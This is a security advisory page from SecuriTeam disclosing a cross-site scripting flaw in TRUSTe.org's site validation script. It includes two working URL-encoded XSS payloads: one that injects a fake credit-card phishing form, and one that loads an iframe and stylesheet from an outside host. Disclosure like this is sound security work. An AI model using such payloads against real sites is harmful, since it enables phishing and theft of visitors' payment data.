SecuriTeam - TRUSTe.org Cross Site Scripting and Phishing Opportunities

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

TRUSTe is an independent, nonprofit organization dedicated to enabling individuals and organizations to establish trusting relationships based on respect for personal identity and information in the evolving networked world. Through extensive consumer and Web site research and the support and guidance of many established companies and industry experts, TRUSTe has earned a reputation as the leader in promoting privacy policy disclosure, informed user consent, and consumer education.

One of TRUSTe.org services involves requesting whether a certain web site is TRUSTe validated or not. This service has been found to contain a cross site scripting vulnerability that opens up the TRUSTe web site to attack and allows also to use TRUSTe as a phishing source.

Credit:
The information has been provided by Andrew Smith.
The original article can be found at: http://wheresthebeef.co.uk/XSS/

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

TRUSTe's 'ivalidate.php' is used to validate "trusted" sites. Whilst the script does add slashes to quotes and closes <script> and <style> tags, there are a number of HTML tags it does not strip, including <linK>,<div>,<iframe>. This leaves the site open to attack from phishers wanting to make their site appear "trusted".

Examples:
https://www.truste.org/ivalidate.php?url=%3Cfont%20size=5px%3EYou%20are%20not%20verified!%3C/font%3E%3Cbr%3E%3Cbr %3EQuick!%20Send%20us%20some%20money%20to%20fix%20this!%3Cform%20action=http://www.antiphishing.org/%3E%3CBR %3ECREDITCARDNUMBER:%3Cinput%20type=text%3E%3Cinput%20type=submit%3E%3C/form%3E%3Cbr%3E%3Cbr%3ETEH %20FLAP%20Strikes%20once%20again%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3CBR%3E%3CBR %3E%3CBR%3E%3CBR%3E

https://www.truste.org/ivalidate.php?url=%3C/b%3E%3C/p%3E%3C/tr%3E%3C/tr%3E%3C/table%3E%3C/center%3E%3C/div%3E %3Clink%20href=http://wheresthebeef.co.uk/XSS/xss.css%20rel=stylesheet%20type=text/css%3E%3Cdiv%20class=pwn%3E %3Ciframe%20src=http://wheresthebeef.co.uk/XSS/xss.htm%20height=1000px%20width=100%25%20FRAMEBORDER=0 %20SCROLLING=NO%3E%20%3C/iframe%3E%3C/div%3E

	SugarCRM Online Document Cross-Site Scripting (XSS) Vulnerability
	Skype URI Processing Arbitrary XML File Deletion Vulnerability
	Skype Protocol Handler Datapath Argument Injection Credential Disclosure Vulnerability
	LedgerSMB Multiple Vulnerabilities
	Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability
	Piwik Cookie Unserialize Vulnerability
	Invision Power Board SQL PHP File Inclusion and SQL Injection
	U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability
	DevIL DICOM Buffer Overflow Vulnerability
	Marvell Driver Multiple Information Element Overflows
	HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution
	HP Color LaserJet Printers Unauthorized Access to Data and DoS
	KDE KDELibs Remote Array Overrun with Arbitrary Code Execution
	Gimp BMP Image Parsing Integer Overflow Vulnerability
	Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation